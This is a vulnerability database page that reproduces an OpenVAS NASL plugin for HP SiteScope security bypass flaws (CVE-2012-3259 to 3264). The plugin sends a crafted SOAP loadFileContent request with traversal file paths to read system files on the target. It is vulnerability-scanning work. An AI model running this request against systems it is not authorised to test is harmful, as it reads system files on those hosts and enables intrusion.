Lucene search
+L

HP SiteScope Multiple Security Bypass Vulnerabilities

🗓️ 07 Sep 2012 00:00:00Reported by Copyright (C) 2012 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 31 Views

HP SiteScope Multiple Security Bypass Vulnerabilitie

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-3260
29 May 201815:50
circl
circl
Circl
CVE-2012-3261
29 May 201815:50
circl
cve
CVE
CVE-2012-3259
25 Sep 201210:00
cve
cve
CVE
CVE-2012-3260
25 Sep 201210:00
cve
cve
CVE
CVE-2012-3261
25 Sep 201210:00
cve
cve
CVE
CVE-2012-3262
25 Sep 201210:00
cve
cve
CVE
CVE-2012-3263
25 Sep 201210:00
cve
cve
CVE
CVE-2012-3264
25 Sep 201210:00
cve
cvelist
Cvelist
CVE-2012-3259
25 Sep 201210:00
cvelist
cvelist
Cvelist
CVE-2012-3260
25 Sep 201210:00
cvelist
Rows per page
# SPDX-FileCopyrightText: 2012 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:hp:sitescope";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103560");
  script_cve_id("CVE-2012-3259", "CVE-2012-3260", "CVE-2012-3261", "CVE-2012-3262",
                "CVE-2012-3263", "CVE-2012-3264");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_version("2025-04-15T05:54:49+0000");

  script_name("HP SiteScope Multiple Security Bypass Vulnerabilities");

  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/55269");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/55273");

  script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
  script_tag(name:"creation_date", value:"2012-09-07 17:11:57 +0200 (Fri, 07 Sep 2012)");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2012 Greenbone AG");
  script_dependencies("gb_hp_sitescope_detect.nasl", "os_detection.nasl");
  script_mandatory_keys("hp/sitescope/installed");
  script_require_ports("Services/www", 8080);

  script_tag(name:"summary", value:"HP SiteScope is prone to multiple security bypass vulnerabilities.");
  script_tag(name:"impact", value:"Successful exploits may allow attackers to bypass the bypass security
  restrictions and to perform unauthorized actions such as execution of
  arbitrary code in the context of the application.");
  script_tag(name:"solution", value:"Updates are available. Please contact the vendor.");
  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"qod_type", value:"remote_app");

  exit(0);
}

include("host_details.inc");
include("os_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("traversal_func.inc");

if (!port = get_app_port(cpe: CPE))
  exit(0);

if (!dir = get_app_location(cpe: CPE, port: port))
  exit(0);

if (dir == "/")
  dir = "";

useragent = http_get_user_agent();
host = http_host_name(port:port);

files =  traversal_files();

foreach pattern(keys(files)) {

  file = files[pattern];

  soap = string("<?xml version='1.0' encoding='UTF-8'?>\r\n",
                "<wsns0:Envelope\r\n",
                "xmlns:wsns1='http://www.w3.org/2001/XMLSchema-instance'\r\n",
                "xmlns:xsd='http://www.w3.org/2001/XMLSchema'\r\n",
                "xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'\r\n",
                ">\r\n",
                "<wsns0:Body\r\n",
                "wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'\r\n",
                ">\r\n",
                "<impl:loadFileContent\r\n",
                "xmlns:impl='http://Api.freshtech.COM'\r\n",
                ">\r\n",
                "<in0\r\n",
                "xsi:type='xsd:string'\r\n",
                "xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'\r\n",
                ">",file,"</in0>\r\n",
                "</impl:loadFileContent>\r\n",
                "</wsns0:Body>\r\n",
                "</wsns0:Envelope>\r\n");
  len = strlen(soap);

  req = string("POST ", dir, "/services/APIMonitorImpl HTTP/1.1\r\n",
               "Host: ", host, "\r\n",
               "User-Agent: ", useragent, "\r\n",
               'SOAPAction: ""',"\r\n",
               "Content-Type: text/xml; charset=UTF-8\r\n",
               "Content-Length: ",len,"\r\n",
               "\r\n",
                soap);
  result = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);

  if(eregmatch(string:result, pattern:pattern)) {
    security_message(port:port);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2025 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 210
EPSS0.6022
31